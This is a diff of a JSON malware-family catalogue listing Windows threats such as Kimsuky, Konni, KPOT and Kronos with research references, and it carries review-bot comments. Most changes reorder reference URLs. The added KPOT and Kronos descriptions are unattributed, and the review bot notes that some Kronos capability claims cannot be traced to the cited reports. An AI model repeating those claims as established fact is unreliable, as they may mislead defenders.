 "https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk",
- "https://www.secureworks.com/research/threat-profiles/iron-viking",
+ "https://attack.mitre.org/groups/G0034",
 "https://www.welivesecurity.com/2017/01/05/killdisk-now-targeting-linux-demands-250k-ransom-cant-decrypt",
- "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
- "https://www.youtube.com/watch?v=mrTdSdMMgnk",
- "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
 "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks",
 "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://attack.mitre.org/groups/G0034"
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
+ "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
+ "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "https://www.secureworks.com/research/threat-profiles/iron-viking"
 ],
 "synonyms": [],
 "type": []
@@ -30218,21 +31682,22 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kimsuky",
 "https://metaswan.github.io/posts/Malware-Kimsuky-group's-resume-impersonation-malware",
- "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html",
- "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/",
- "https://www.boho.or.kr/filedownload.do?attach_file_seq=2652&attach_file_id=EpF2652.pdf",
- "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html",
+ "https://asec.ahnlab.com/en/53046/",
+ "https://medium.com/walmartglobaltech/pivoting-on-a-sharpext-to-profile-kimusky-panels-for-great-good-1920dc1bcef9",
+ "https://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html",
+ "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure",
 "https://vblocalhost.com/presentations/operation-newton-hi-kimsuky-did-an-appleseed-really-fall-on-newtons-head/",
 "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Kim.pdf",
- "https://blog.prevailion.com/2019/09/autumn-aperture-report.html",
 "https://asec.ahnlab.com/en/37396/",
- "https://blog.alyac.co.kr/2347",
 "https://asec.ahnlab.com/en/30532/",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://medium.com/walmartglobaltech/pivoting-on-a-sharpext-to-profile-kimusky-panels-for-great-good-1920dc1bcef9",
- "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure",
+ "https://blog.prevailion.com/2019/09/autumn-aperture-report.html",
 "https://inquest.net/blog/2021/08/23/kimsuky-espionage-campaign",
- "https://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html"
+ "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html",
+ "https://www.boho.or.kr/filedownload.do?attach_file_seq=2652&attach_file_id=EpF2652.pdf",
+ 
"https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://blog.alyac.co.kr/2347",
+ "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/"
 ],
 "synonyms": [],
 "type": []
@@ -30245,12 +31710,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kingminer",
- "https://www.bitdefender.com/files/News/CaseStudies/study/354/Bitdefender-PR-Whitepaper-KingMiner-creat4610-en-EN-GenericUse.pdf",
- "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-labs-kingminer-botnet-report.pdf",
- "https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/",
- "https://www.trendmicro.com/en_us/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html",
+ "https://asec.ahnlab.com/en/32572/",
 "https://news.sophos.com/en-us/2020/06/09/kingminer-report/",
- "https://asec.ahnlab.com/en/32572/"
+ "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-labs-kingminer-botnet-report.pdf",
+ "https://www.trendmicro.com/en_us/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html",
+ "https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/354/Bitdefender-PR-Whitepaper-KingMiner-creat4610-en-EN-GenericUse.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -30264,9 +31729,9 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kins",
 "https://www.vkremez.com/2018/10/lets-learn-exploring-zeusvm-banking.html",
+ "https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/",
 "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/",
- "https://github.com/nyx0/KINS",
- "https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/"
+ "https://github.com/nyx0/KINS"
 ],
 "synonyms": [
 "Kasper Internet Non-Security",
@@ -30282,9 +31747,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kivars",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt",
 "https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/"
 ],
 "synonyms": [],
 "type": []
@@ -30309,6 +31774,7 @@
 "description": "KleptoParasite Stealer is advertised on Hackforums as a noob-friendly stealer. It is modular and comes with a IP retriever module, a Outlook stealer (32bit/64bit) and a Chrome/Firefox stealer (32bit/64bit). Earlier versions come bundled (loader plus modules), newer versions come with a loader (167k) that grabs the modules.\r\n\r\nPDB-strings suggest a relationship to JogLog v6 and v7.",
 "meta": {
 "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer",
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer"
 ],
 "synonyms": [
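Review bot: The KleptoParasite hunk (`@@ -30309,6 +31774,7 @@`) adds a ref that is byte-identical to the context line directly below it, so `refs` now contains `"https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer"` twice; the added line should be dropped. A duplicate string in a JSON array is valid and will not break consumers, but it suggests the generator merged the existing ref with the source list without de-duplicating, so the same thing may recur on the next regeneration. Consider de-duplicating `refs` (preserving order) in the export step rather than by hand. The KleptoParasite object begins and ends outside this hunk.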
@@ -30338,8 +31804,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd",
- "https://securitykitten.github.io/2016/11/28/the-klrd-keylogger.html",
- "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks"
+ "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
+ "https://securitykitten.github.io/2016/11/28/the-klrd-keylogger.html"
 ],
 "synonyms": [],
 "type": []
@@ -30365,18 +31831,18 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic",
- "https://github.com/zerosum0x0/koadic",
- "http://www.secureworks.com/research/threat-profiles/cobalt-ulster",
- "https://www.secureworks.com/research/threat-profiles/gold-drake",
- "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
 "https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf",
- "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
 "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf",
+ "https://blog.tofile.dev/2020/11/28/koadic_jarm.html",
 "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/",
- "https://www.secureworks.com/research/threat-profiles/cobalt-ulster",
- "http://www.secureworks.com/research/threat-profiles/gold-drake",
+ "http://www.secureworks.com/research/threat-profiles/cobalt-ulster",
+ "https://github.com/zerosum0x0/koadic",
 "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf",
- "https://blog.tofile.dev/2020/11/28/koadic_jarm.html"
+ "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
+ "http://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-ulster",
+ "https://www.secureworks.com/research/threat-profiles/gold-drake"
 ],
 "synonyms": [],
 "type": []
@@ -30415,10 +31881,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.komprogo",
+ "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf",
 "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
- "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx",
 "https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2015-120808-5327-99",
- "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf"
+ "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx"
 ],
 "synonyms": [
 "Splinter RAT"
@@ -30433,25 +31899,25 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.konni",
- "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/",
- "https://blog.alyac.co.kr/2474",
- "https://www.bleepingcomputer.com/news/security/hackers-take-over-diplomats-email-target-russian-deputy-minister/",
- "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html",
- "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
+ "https://cocomelonc.github.io/malware/2022/09/06/malware-tricks-23.html",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/01/konni-evolves-into-stealthier-rat/",
+ "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html",
+ "https://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/",
 "https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/",
 "https://www.bleepingcomputer.com/news/security/north-korean-hackers-attack-eu-targets-with-konni-rat-malware/",
 "https://cluster25.io/wp-content/uploads/2022/01/Konni_targeting_Russian_diplomatic_sector.pdf",
+ "https://blog.alyac.co.kr/2474",
 "https://blog.lumen.com/new-konni-campaign-targeting-russian-ministry-of-foreign-affairs/",
- "https://blog.malwarebytes.com/threat-intelligence/2022/01/konni-evolves-into-stealthier-rat/",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-227a",
- "http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html",
- "https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant",
- "https://e.cyberint.com/hubfs/Cyberint_Konni%20Malware%202019%20Campaign_Report.pdf",
- "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html",
+ "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
 
"https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/",
- "https://cocomelonc.github.io/malware/2022/09/06/malware-tricks-23.html",
- "https://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/",
- "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b"
+ "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/",
+ "https://e.cyberint.com/hubfs/Cyberint_Konni%20Malware%202019%20Campaign_Report.pdf",
+ "https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant",
+ "http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html",
+ "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html",
+ "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-227a",
+ "https://www.bleepingcomputer.com/news/security/hackers-take-over-diplomats-email-target-russian-deputy-minister/"
 ],
 "synonyms": [],
 "type": []
@@ -30477,26 +31943,27 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia",
- "https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/",
- "https://www.sentinelone.com/labs/targets-of-interest-russian-organizations-increasingly-under-attack-by-chinese-apts/",
- "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
- "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf",
+ "https://www.youtube.com/watch?v=_fstHQSK-kk",
+ "https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment",
 "https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html",
- "https://www.secureworks.com/research/threat-profiles/bronze-huntley",
+ "https://www.sentinelone.com/labs/targets-of-interest-russian-organizations-increasingly-under-attack-by-chinese-apts/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_3_takai_jp.pdf",
+ "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2014-11-25-curious-korlia.md",
+ "https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/",
+ "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf",
+ "https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/",
+ "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf",
+ "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf",
 "https://web.archive.org/web/20130920120931/https:/www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf",
 "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/",
- "https://securitykitten.github.io/2014/11/25/curious-korlia.html",
 "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.93_ENG.pdf",
- "http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit",
- 
"https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2014-11-25-curious-korlia.md",
- "https://www.youtube.com/watch?v=_fstHQSK-kk",
 "https://asec.ahnlab.com/1298",
 "https://unit42.paloaltonetworks.com/unit42-bisonal-malware-used-attacks-russia-south-korea/",
- "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf",
- "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf",
- "https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_3_takai_jp.pdf",
- "https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/"
+ "https://www.secureworks.com/research/threat-profiles/bronze-huntley",
+ "https://securitykitten.github.io/2014/11/25/curious-korlia.html",
+ "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2023-0919.pdf",
+ "http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit"
 ],
 "synonyms": [
 "Bisonal"
@@ -30511,17 +31978,18 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kovter",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/kovter-an-evolving-malware-gone-fileless",
 "https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/",
- "https://0x00sec.org/t/analyzing-modern-malware-techniques-part-1/18663",
- "https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
 "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Kovter/Kovter.md",
- "https://www.symantec.com/connect/blogs/kovter-malware-learns-poweliks-persistent-fileless-registry-update",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
- "https://0xchrollo.github.io/articles/unpacking-kovter-malware/",
 "https://github.com/ewhitehats/kovterTools/blob/master/KovterWhitepaper.pdf",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a"
+ "https://www.cybereason.com/blog/how-click-fraud-commodity-malware-transforms-into-an-advanced-threat",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/kovter-an-evolving-malware-gone-fileless",
+ "https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/",
+ "https://0x00sec.org/t/analyzing-modern-malware-techniques-part-1/18663",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ 
"https://www.symantec.com/connect/blogs/kovter-malware-learns-poweliks-persistent-fileless-registry-update",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://0xchrollo.github.io/articles/unpacking-kovter-malware/"
 ],
 "synonyms": [],
 "type": []
@@ -30530,23 +31998,23 @@
 "value": "Kovter"
 },
 {
- "description": "",
+ "description": "KPOT is an information-stealing Trojan horse that can steal information from infected computers. It is distributed through phishing emails and malicious websites. Once executed on a computer, KPOT can steal passwords, credit card numbers, and other personal information.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer",
- "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
- "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/kpot2/KPOT.md",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://medium.com/s2wlab/deep-analysis-of-kpot-stealer-fb1d2be9c5dd",
 "https://isc.sans.edu/diary/26010",
- "https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/",
- "https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/",
- "https://isc.sans.edu/diary/25934",
- "https://www.proofpoint.com/us/threat-insight/post/new-kpot-v20-stealer-brings-zero-persistence-and-memory-features-silently-steal",
 "https://blog.ensilo.com/game-of-trojans-dissecting-khalesi-infostealer-malware",
 "https://blag.nullteilerfrei.de/2020/04/26/use-ghidra-to-decrypt-strings-of-kpotstealer-malware/",
+ "https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/",
+ "https://isc.sans.edu/diary/25934",
+ "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/kpot2/KPOT.md",
+ "https://news.drweb.com/show/?i=13242&lng=en",
 "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://news.drweb.com/show/?i=13242&lng=en"
+ "https://medium.com/s2wlab/deep-analysis-of-kpot-stealer-fb1d2be9c5dd",
+ 
"https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://www.proofpoint.com/us/threat-insight/post/new-kpot-v20-stealer-brings-zero-persistence-and-memory-features-silently-steal",
+ "https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/",
+ "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors"
 ],
 "synonyms": [
 "Khalesi",
@@ -30575,10 +32043,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kraken",
- "https://securingtomorrow.mcafee.com/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/",
 "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
 "https://www.bleepingcomputer.com/news/security/kraken-cryptor-ransomware-masquerading-as-superantispyware-security-program/",
- "https://www.recordedfuture.com/kraken-cryptor-ransomware/"
+ "https://www.recordedfuture.com/kraken-cryptor-ransomware/",
+ "https://securingtomorrow.mcafee.com/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/"
 ],
 "synonyms": [],
 "type": []
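Review bot: The new KPOT description (`@@ -30530,23 +31998,23 @@`) is generic, unattributed prose: it names no source and none of the entries in `refs` is identified as where the summary comes from, whereas neighbouring entries such as KHRAT and KRBanker open with "According to Unit42" / "ThreatPost describes". The Kronos description added in the `@@ -30618,30 +32100,30 @@` hunk has the same problem and goes further, asserting specific capabilities (bypassing two-factor authentication, self-updating to evade security patches) that a reader cannot trace to any of the listed reports. Suggest either prefixing each with its source, e.g. `"description": "According to <SOURCE — placeholder>, KPOT is an information-stealing Trojan ..."`, or trimming the text to what the cited references actually state. Both objects begin outside their hunks.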
@@ -30586,15 +32054,29 @@
 "uuid": "3d7ae6b9-8161-470e-a7b6-752151b21657",
 "value": "Kraken"
 },
+ {
+ "description": "KrakenKeylogger is a .NET based Infostealer malware sold in Underground hacking forums",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.krakenkeylogger",
+ "https://0xtoxin.github.io/threat%20hunting/KrakenKeylogger-pt2/",
+ "https://0xtoxin.github.io/malware%20analysis/KrakenKeylogger-pt1/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6b15469a-64ff-4edc-99dd-60f7a277d5c1",
+ "value": "KrakenKeylogger"
+ },
 {
 "description": "ThreatPost describes KRBanker (Blackmoon) as a banking Trojan designed to steal user credentials from various South Korean banking institutions. It was discovered in early 2014 and since then has adopted a variety of infection and credential stealing techniques.\r\n\r\n",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker",
- "http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/",
- "https://fidelissecurity.com/threatgeek/threat-intelligence/blackmoon-banking-trojan-new-framework/",
- "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/",
 "https://www.peppermalware.com/2019/03/analysis-of-blackmoon-banking-trojans.html",
+ "https://fidelissecurity.com/threatgeek/threat-intelligence/blackmoon-banking-trojan-new-framework/",
+ "http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/",
+ "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/",
 "https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan"
 ],
 "synonyms": [
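Review bot: The new KrakenKeylogger entry's description is the only one in this chunk without terminal punctuation and it capitalizes "Underground" mid-sentence; suggest `"description": "KrakenKeylogger is a .NET based infostealer malware sold in underground hacking forums."`. The two 0xtoxin references are also listed part 2 before part 1, which is harmless but reads oddly if the order is meant to be meaningful. The entry is complete within this hunk.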
@@ -30618,30 +32100,30 @@
 "value": "KrDownloader"
 },
 {
- "description": "",
+ "description": "Kronos malware is a sophisticated banking Trojan that first emerged in 2014. It is designed to target financial institutions and steal sensitive banking information. The malware is primarily spread through phishing campaigns and exploit kits. Once installed on a victim's computer, Kronos can capture login credentials, credit card details, and other personal information by keylogging and form grabbing techniques. It can also bypass security measures such as two-factor authentication. Kronos employs advanced evasion techniques to avoid detection by antivirus software and actively updates itself to evade security patches. It has been known to target a wide range of banking systems and has affected numerous organizations worldwide. The malware continues to evolve, making it a significant threat to online banking security.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos",
- "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html",
- "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack",
- "https://dissectingmalwa.re/osiris-the-god-of-afterlifeand-banking-malware.html",
- "https://intel471.com/blog/privateloader-malware",
 "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/",
- "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware",
- "https://www.zdnet.com/article/security-researcher-malwaretech-pleads-guilty/",
- "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/",
- "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/",
- "https://unit42.paloaltonetworks.com/banking-trojan-techniques/",
- 
"https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "https://www.proofpoint.com/us/threat-insight/post/kronos-reborn",
- "https://www.zscaler.com/blogs/security-research/ares-malware-grandson-kronos-banking-trojan",
- "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/",
- "https://therecord.media/osiris-banking-trojan-shuts-down-as-new-ares-variant-emerges/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/",
- "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf",
- "https://blog.morphisec.com/long-live-osiris-banking-trojan-targets-german-ip-addresses",
+ "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack",
 "https://twitter.com/3xp0rtblog/status/1294157781415743488",
- "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/"
+ "https://dissectingmalwa.re/osiris-the-god-of-afterlifeand-banking-malware.html",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/",
+ "https://www.proofpoint.com/us/threat-insight/post/kronos-reborn",
+ "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/",
+ "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware",
+ "https://therecord.media/osiris-banking-trojan-shuts-down-as-new-ares-variant-emerges/",
+ "https://www.zscaler.com/blogs/security-research/ares-malware-grandson-kronos-banking-trojan",
+ "https://blog.morphisec.com/long-live-osiris-banking-trojan-targets-german-ip-addresses",
+ 
"https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/",
+ "https://www.zdnet.com/article/security-researcher-malwaretech-pleads-guilty/",
+ "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/",
+ "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf",
+ "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html",
+ "https://unit42.paloaltonetworks.com/banking-trojan-techniques/"
 ],
 "synonyms": [
 "Osiris"
@@ -30669,8 +32151,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ksl0t",
- "https://0ffset.net/reverse-engineering/malware-analysis/analyzing-turlas-keylogger-1/",
 "https://0ffset.wordpress.com/2018/10/05/post-0x17-2-turla-keylogger/",
+ "https://0ffset.net/reverse-engineering/malware-analysis/analyzing-turlas-keylogger-1/",
 "https://0ffset.net/reverse-engineering/malware-analysis/analyzing-turlas-keylogger-2/"
 ],
 "synonyms": [],
@@ -30738,17 +32220,17 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs",
+ "https://www.zdnet.com/article/fbi-re-sends-alert-about-supply-chain-attacks-for-the-third-time-in-three-months/",
 "https://resources.cylera.com/new-evidence-linking-kwampirs-malware-to-shamoon-apts",
- "https://blog.reversinglabs.com/blog/unpacking-kwampirs-rat",
+ "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf",
+ "https://www.securityartwork.es/2019/03/13/orangeworm-group-kwampirs-analysis-update/",
